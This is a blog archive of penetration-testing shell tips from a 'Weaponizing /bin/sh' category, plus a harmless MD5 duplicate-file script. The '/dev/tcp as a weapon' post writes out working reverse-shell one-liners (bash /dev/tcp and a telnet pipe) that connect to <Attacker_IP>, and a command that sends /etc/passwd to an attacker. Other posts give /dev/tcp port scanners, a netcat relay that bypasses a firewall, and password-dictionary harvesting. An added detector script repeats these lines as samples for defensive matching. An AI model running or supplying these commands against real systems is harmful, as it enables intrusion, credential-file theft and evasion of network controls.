Category Archives: Weaponizing /bin/sh

Linux Shells With Built In Tools

Filed under Fu (a.k.a Tips), Weaponizing /bin/sh

I love posts like these: 7 Linux shells using only built-in tools!

Quickly Compare Multiple MD5 Hashes

Filed under Fu (a.k.a Tips), Weaponizing /bin/sh

Recently I was tasked with comparing the MD5 hashes of multiple files to discover which were equivalent to each other. This was the little bit of script I came up with:

#!/bin/sh
# Compare every .JPG in the current directory against all the others by MD5 hash.
# md5 -q is the macOS/BSD tool; on Linux use: md5sum "$f" | cut -d' ' -f1
for f in *.JPG
do
  CURR=$(md5 -q "$f")
  STRING="$f EQUALS:"
  echo "Processing $f: $CURR"
  for j in *.JPG
  do
    [ "$j" = "$f" ] && continue        # don't report a file as equal to itself
    CHECK=$(md5 -q "$j")
    if [ "$CURR" = "$CHECK" ]; then    # POSIX test uses a single =, not ==
      STRING="$STRING $j"
    fi
  done
  echo "$STRING"
done

It simply loops through each file in a directory comparing the md5 hash to the hash of all the other files in the directory.
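The nested loop above hashes every file once per other file. As an added example (not the post's script), this version hashes each file once, sorts by digest and groups the matches; it uses SHA-256 rather than MD5 because MD5 is not collision resistant, and assumes sha256sum or shasum is installed.

```shell
#!/bin/sh
# Added example (not the original post's script): hash each file in a directory
# once, then group the files whose digests match, instead of re-hashing every
# file for every other file. Uses SHA-256 (sha256sum on Linux, shasum on macOS)
# because MD5 is not collision resistant, so equal MD5s can be forged.

# Print "digest<TAB>path" for every regular file directly under $1.
hash_dir() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        if command -v sha256sum >/dev/null 2>&1; then
            sum=$(sha256sum "$f" | cut -d' ' -f1)
        else
            sum=$(shasum -a 256 "$f" | cut -d' ' -f1)
        fi
        printf '%s\t%s\n' "$sum" "$f"
    done
}

# One line per digest seen more than once: "digest path1 path2 ...".
# Paths are space-separated, so this assumes file names without spaces.
find_dupes() {
    hash_dir "$1" | sort | awk 'BEGIN { FS = "\t" }
        { paths[$1] = paths[$1] " " $2; n[$1]++ }
        END { for (h in n) if (n[h] > 1) print h paths[h] }' | sort
}

# Number of duplicate groups, for a quick yes/no check in a script.
count_dupe_groups() {
    find_dupes "$1" | wc -l | tr -d ' '
}

# Constructed demo: two identical files and one that differs.
demo() {
    d=$(mktemp -d)
    printf 'same\n' > "$d/a.JPG"
    printf 'same\n' > "$d/b.JPG"
    printf 'other\n' > "$d/c.JPG"
    find_dupes "$d"
    rm -rf "$d"
}
```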

Another /dev/tcp port scanner

Filed under Fu (a.k.a Tips), Weaponizing /bin/sh

I stumbled across this while searching for alternate methods of port scanning via the command line. I guess my previous command didn’t work for everybody.

Here it is:

for p in {1..1023}
do
  (echo >/dev/tcp/localhost/$p) >/dev/null 2>&1 && echo "$p open"
done

However, to get it to run on a single line of code, you just gotta add a little bit. Here it is:

for p in {1..1023}; do (echo "test" > /dev/tcp/127.0.0.1/$p) >/dev/null 2>&1 && echo "$p open"; done

Enjoy!

Generating Targeted Dictionaries

Filed under Fu (a.k.a Tips), Weaponizing /bin/sh

Here are some tips I picked up on for generating targeted dictionaries for password attacks.

One Way

A simple process would involve something like this:

mkdir target

cd target

wget -r -l [depth_of_pages_to_retrieve] [target_site]

After that, you can go through each file (probably script it) and pull out unique words like this:

sort file.txt | uniq > targeted_dictionary.txt

That is a pretty messy way to do it though. Here is a better way:

A Better Way

mkdir /tmp/target
cd /tmp/target
wget -r -l [depth_of_pages_to_retrieve] [target_site]
cd ..
grep -h -r "" target | tr '[:space:]' '\n' | sort | uniq > targeted_dictionary.lst
grep -v '<' targeted_dictionary.lst > final_targeted_dictionary.lst

Note: the square brackets in '[:space:]' are part of the command, so make sure to include them.

Standard Netcat Relay

Filed under Fu (a.k.a Tips), Weaponizing /bin/sh

Sometimes it's useful to have little things like this available. But first, let me outline the scenario:

  • You want an SSH connection to a system
  • The firewall is blocking inbound SSH connections

Assuming that you already have some sort of shell access on the target machine, this is your nice little workaround:

$ mknod redirect p
$ nc -l -p [permitted_inbound_port] 0< redirect | nc 127.0.0.1 22 1> redirect

It works in two simple steps:

  1. The first command creates a named pipe.
  2. The second starts a netcat listener on the permitted port. Whatever the listener receives is piped into a second netcat connected to SSH on localhost, and that netcat's output is written into the named pipe, which the listener reads back as its input and returns to the client.

To connect, you simply connect to the machine with the appropriate login, but on a different port:

$ ssh [login]@[target] -p [port_of_netcat_listener]

You will obviously need netcat for this. Enjoy!

Heartbeat Detector for Services

Filed under Fu (a.k.a Tips), Weaponizing /bin/sh

This is a sweet little bit of command line kung-fu made available by Ed Skoudis. It makes your terminal beep once a second for as long as a service answers, so when the service dies, so does the heartbeat. You just got to try it out! Here it is:

$ while (true); do nc -vv -z -w3 <target_ip> <target_port> > /dev/null && echo -e "\x07"; sleep 1; done

This is for use on linux, and you will also need netcat.

enjoy!

/dev/tcp as a weapon

Filed under Fu (a.k.a Tips), Weaponizing /bin/sh

UPDATE: Check here to enable /dev/tcp on BackTrack

Here is some Fu to improve your game when pen testing *nix.

Situation: You have shell access to a *nix system. You are looking to create a reverse shell, scan other machines on the subnet, and do some file transfer (/etc/passwd). However, there are some things preventing you:

  1. Scope prevents you from uploading any files onto the machine
  2. A Firewall/AV prevents using something like netcat.

What do you do? Use /dev/tcp.

What is /dev/tcp?

This is a pseudo-file that bash handles itself rather than a real file on disk: redirecting to /dev/tcp/<host>/<port> makes bash open a TCP connection to that host and port, which lets you interact directly with TCP from the shell (so it only works in a bash built with that support).

Fu

In order to get this to work, you need to be able to set up netcat listeners on your own machine. This can be done like this:

$ nc -l -p <port>

Transfer file:

This is pretty straightforward, just like you would imagine:

cat /etc/passwd > /dev/tcp/<Attacker_IP>/<Port>

Back on your listener console you will see the contents of /etc/passwd. You can just as easily redirect that into a file for parsing or future reference.

Port Scanner

This piece of art comes from Pen Testing Ninjitsu. To create a port scanner using built-in bash commands, this is what you are looking to do:

port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/<TARG_IP>/$port; [ $? -eq 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done

Let me break this down for you:

  • Create a variable called port and set its value to 1
port=1;
  • Create a loop that keeps running as long as the variable 'port' is less than 1024
while [ $port -lt 1024 ];
  • For each iteration, send some packets to the target IP address, with the port number equal to the current value of our 'port' variable
do echo > /dev/tcp/<TARG_IP>/$port;
  • Check bash's exit status ($?) from that echo into /dev/tcp: zero means there were no errors, i.e. the connection succeeded
[ $? -eq 0 ]
  • If it IS zero, append a line to /tmp/ports.txt stating that the port just scanned is open
&& echo $port "is open" >> /tmp/ports.txt;
  • Now increment the value of 'port' by 1 and finish this iteration of the loop
port=`expr $port + 1`; done

Pretty messy, but also fairly straightforward. You could then just read

Backdoor/Reverse Shell

This is pretty slick in my opinion. It replicates netcat almost exactly. Not as pretty as some things, but still nice:

/bin/bash -i > /dev/tcp/<Attacker_IP>/<port> 0<&1 2>&1

This is also straight forward:

  • Invoke an interactive bash shell
/bin/bash -i
  • Pipe that shell to the attacker (who has a netcat listener running)
> /dev/tcp/<Attacker_IP>/<port>
  • Take standard input, and connect it to standard output. Do the same with standard error (2>)
0<&1 2>&1

Here is another variation that may work for others:

/bin/bash 0</dev/tcp/targ_ip/port 1>&0 2>&0

This can also be similarly done using telnet by doing the following (although you need two listeners):

telnet <attacker_ip> <port_a> | /bin/bash | telnet <attacker_ip> <port_b>

Pretty elite. Hope it helps!
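From the defender's side, the same one-liners are what you want to catch in shell history or collected command lines. This added example (not from the post) flags the patterns shown on this page: the /dev/tcp reverse shells and file transfer, the /dev/tcp port-scan loops, the netcat FIFO relay and the telnet pipe; all sample lines are constructed.

```shell
#!/bin/sh
# Added example, not from the original post: flag the command patterns on this
# page (/dev/tcp reverse shells and transfers, /dev/tcp scan loops, the netcat
# relay, the telnet pipe) in shell history or auditd/EDR command lines.
# All sample lines below are constructed; the IPs are from RFC 5737 ranges.

# Test the line held in $line against an extended regex.
m() { printf '%s\n' "$line" | grep -Eq -- "$1"; }

# Classify one command line; prints a label, or "clean" if nothing matches.
classify_cmd() {
    line=$1
    if m '(^|[ /;|])(ba)?sh( |$).*/dev/tcp/.*[<>]&[0-9]'; then
        echo "reverse-shell:/dev/tcp"           # shell stdio bound to a socket
    elif m 'telnet .*\|.*(ba)?sh.*\|.*telnet'; then
        echo "reverse-shell:telnet-pipe"        # telnet | sh | telnet
    elif m '(^|[ ;|])nc .*-l.*\| *nc '; then
        echo "relay:netcat-listener-to-netcat"  # nc -l ... | nc host port
    elif m '/dev/tcp/[^/ ]+/\$'; then
        echo "portscan:/dev/tcp-loop"           # port taken from a loop variable
    elif m '> */dev/tcp/'; then
        echo "exfil:/dev/tcp"                   # file contents sent to a socket
    else
        echo "clean"
    fi
}

# Read command lines on stdin; print "label<TAB>line" for each suspicious one.
scan_history() {
    while IFS= read -r line; do
        label=$(classify_cmd "$line")
        [ "$label" = clean ] && continue
        printf '%s\t%s\n' "$label" "$line"
    done
}

# Constructed sample: one benign line, the page's one-liners, the heartbeat.
SAMPLE_HISTORY='ls -la /tmp
/bin/bash -i > /dev/tcp/203.0.113.5/4444 0<&1 2>&1
cat /etc/passwd > /dev/tcp/203.0.113.5/4445
for p in {1..1023}; do (echo > /dev/tcp/127.0.0.1/$p) >/dev/null 2>&1 && echo "$p open"; done
nc -l -p 8080 0< redirect | nc 127.0.0.1 22 1> redirect
telnet 203.0.113.5 4446 | /bin/bash | telnet 203.0.113.5 4447
while (true); do nc -vv -z -w3 192.0.2.10 443 > /dev/null && echo -e "\x07"; sleep 1; done'

# Alert count over the sample (5 of the 7 lines; the heartbeat is clean).
count_sample_alerts() {
    printf '%s\n' "$SAMPLE_HISTORY" | scan_history | wc -l | tr -d ' '
}
```

Feed real history with `scan_history < ~/.bash_history`; the regexes are deliberately narrow, so treat a hit as a lead to verify, not proof.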
